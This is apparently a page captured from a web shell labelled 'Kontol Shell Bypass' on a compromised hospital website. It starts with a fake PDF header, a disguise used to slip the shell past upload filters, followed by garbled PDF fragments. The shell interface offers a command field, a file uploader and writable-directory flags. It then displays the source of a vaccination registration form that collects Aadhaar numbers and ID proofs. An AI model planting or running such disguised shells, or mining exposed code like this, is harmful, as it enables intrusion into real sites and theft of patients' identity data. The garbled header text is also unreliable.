%PDF- <> %âãÏÓ endobj 2 0 obj <> endobj 3 0 obj <>/ExtGState<>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI] >>/Annots[ 28 0 R 29 0 R] /MediaBox[ 0 0 595.5 842.25] /Contents 4 0 R/Group<>/Tabs/S>> endobj ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµù Õ5sLOšuY>endobj 2 0 obj<>endobj 2 0 obj<>endobj 2 0 obj<>endobj 2 0 obj<> endobj 2 0 obj<>endobj 2 0 obj<>es 3 0 R>> endobj 2 0 obj<> ox[ 0.000000 0.000000 609.600000 935.600000]/Fi endobj 3 0 obj<> endobj 7 1 obj<>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI]>>/Subtype/Form>> stream

nadelinn - rinduu

Command :

ikan Uploader :
Directory :  /var/www/html/shardahospital.org/cowin/application/views/
Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 
Current File : /var/www/html/shardahospital.org/cowin/application/views/edit_profile.php
<div class="container">
    <div class="row">
        <div class="col col-lg-12">
        <div class="login-header">
       <!-- <p>Already a Member?</p>
        <button  type="button" class="btn btn-primary header-btn" onclick="window.location.href = 'login.html';">Login </button>-->
        
        </div>
        </div>
    </div>
</div>
<div class="container">
    <div class="row">
        <div class="col-lg-3"></div>
        
        <div class="col-lg-6">
            <div class="login-rectangle">
            	<a href="<?=base_url('dashboard')?>" class="backtodash"><i class="fa fa-arrow-left" aria-hidden="true"></i> Back </a>
            	<div class="login-logo"> 
                <img src="<?=base_url('assests/imgs')?>/logo_new.png"> 
                </div>
				<form action="" method="POST" enctype="multipart/form-data">  
					<?php if (validation_errors()) { ?>
					<div class="alert alert-danger"><?= validation_errors() ?></div>
					<?php  } ?>
		
					<div class="login-sec">
						<h2>Your Details</h2>
						<p>Please provide the Co-WIN registration details used to register this user.</p>
						
						<div class="radio-btn">
                        	<span>Vaccination </span>
                        	<label><input type="radio" name="vaccination_type" id="vaccination_type" value="1" checked onclick="return showHide('1');" <?php if($recored['vaccination_type']=='1') {  echo 'checked'; }?> >Onsite </label>
                            <label><input type="radio" name="vaccination_type" id="vaccination_type" value="2" onclick="return showHide('2');" <?php if($recored['vaccination_type']=='2') {  echo 'checked'; }?>>Onspot </label>
                        </div> 
					<span style="display:none;" id="corporate_name">
							<select name="company_name" id="company_name">
								<option value="" >Select Company</option>
								<?php foreach($companyArray as $row) { ?>
									<option value="<?=$row['title']?>" <?php if($recored['company_name'] ==$row['title']){ echo 'selected'; }?>><?=$row['title']?></option>
								<?php } ?>
							</select>
							<select name="other_id_proof" id="other_id_proof">
                        	<option value="" >Photo Id Proof</option>
							<?php foreach($idproofArray as $row) { ?>
								<option value="<?=$row['title']?>" <?php if($recored['id_proof'] ==$row['title']){ echo 'selected'; }?>><?=$row['title']?></option>
							<?php } ?>
                        </select> 
						</span>
						<span id="onsite_name">
						<select name="id_proof" id="id_proof">
                        	<!--<option value="" >Photo Id Proof</option>--> 
							<?php foreach($proofArray as $row) { ?>
								<option value="<?=$row['title']?>" <?php if($recored['id_proof'] ==$row['title']){ echo 'selected'; }?>><?=$row['title']?></option>
							<?php } ?>
                        </select> 
						</span>
						<input type="hidden" name="id" id="id" value="<?=$recored['id']?>" />
						<input type="text" name="full_name" id="full_name" value="<?=$recored['full_name']?>" autocomplete=OFF maxlength=245 placeholder="Name (as in Adhaar No)" required>
						<small  id="website">If not registered on Co-WIN portal please <a href="https://selfregistration.cowin.gov.in/" target="_blank">Register at Co-WIN portal</a></small>
						<input type="text" name="aadhar_number" value="<?=$recored['aadhar_number']?>" id="aadhar_number" onkeyup="this.value=this.value.replace(/[^\d]/,'')" autocomplete=OFF maxlength=12 placeholder="Beneficiary COWIN Ref ID" required>
						<input type="email" name="email_id" id="email_id" value="<?=$recored['email_id']?>" autocomplete=OFF maxlength=120 placeholder="Beneficiary Email ID">
						<input type="date" name="dob" id="dob" autocomplete=OFF value="<?=$recored['dob']?>" placeholder="Beneficiary DOB(as in ID Proof)" required>
				                        
                        
                        <div class="radio-btn">
                        <span id="cowin_ref">COWIN REF ID Reciept</span>
						   <a href="<?=base_url('attachments/documents/'.$recored['photo_proof'])?>" target="_blank"><?=$recored['photo_proof']?></a>
                           <input type="file" name="photo_proof" id="photo_proof" placeholder="Upload Photo id Proof">
						   <small>(Only jpg, jpeg, png and pdf allowed)</small>
						   <input type="hidden" name="old_document" id="old_document" value="<?=$recored['photo_proof']?>" />
                        </div>
                         <div class="radio-btn">
                        	<span>Gender</span>
                        	<label><input type="radio" name="gender" id="gender" value="Male" <?php if($recored['gender']=='Male' || $recored['gender']==''){ ?>checked <?php } ?>>Male </label>
                            <label><input type="radio" name="gender" id="gender" value="Female" <?php if($recored['gender']=='Female'){ ?>checked <?php } ?>>Female </label>
                            <label><input type="radio" name="gender" id="gender" value="Other" <?php if($recored['gender']=='Other'){ ?>checked <?php } ?>>Other </label>
                         </div> 
                    					
					   <div class="radio-btn">
                       <span style="color:red;">*All Fileds are mandatory</span>
                       </div>
					   <button type="submit" class="btn btn-primary login-btn">Save </button>
					</div>
            	</form>
                <div class="login-pin"></div>
            </div>
        
        </div>
        
        <div class="col col-lg-3"></div>
    </div>
</div>

 <script>
	function showHide(actype)
	{
		if(actype=='2') {
			$('#corporate_name').show();
			$('#onsite_name').hide();
			$('#website').hide();
			$('#aadhar_number').attr("placeholder", "Beneficiary ID Proof.");
			$('#address').attr("placeholder", "Full Company Address With Pincode.");
			$('#cowin_ref').html("Please upload photo id proof");
			$('#cowin_ref').html("Please upload photo id proof");
		} else {
			$('#corporate_name').hide();
			$('#onsite_name').show();
		}
	}
	<?php if($recored['vaccination_type']<>'') {  ?>
	$(window).load(function() {
	// executes when complete page is fully loaded, including all frames, objects and images
		showHide(<?=$recored['vaccination_type']?>);
	});
	<?php } ?>
</script>
 

Kontol Shell Bypass